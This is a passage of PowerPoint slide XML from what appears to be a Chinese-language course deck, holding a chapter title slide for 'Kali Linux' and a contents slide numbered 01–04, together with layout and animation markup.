                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
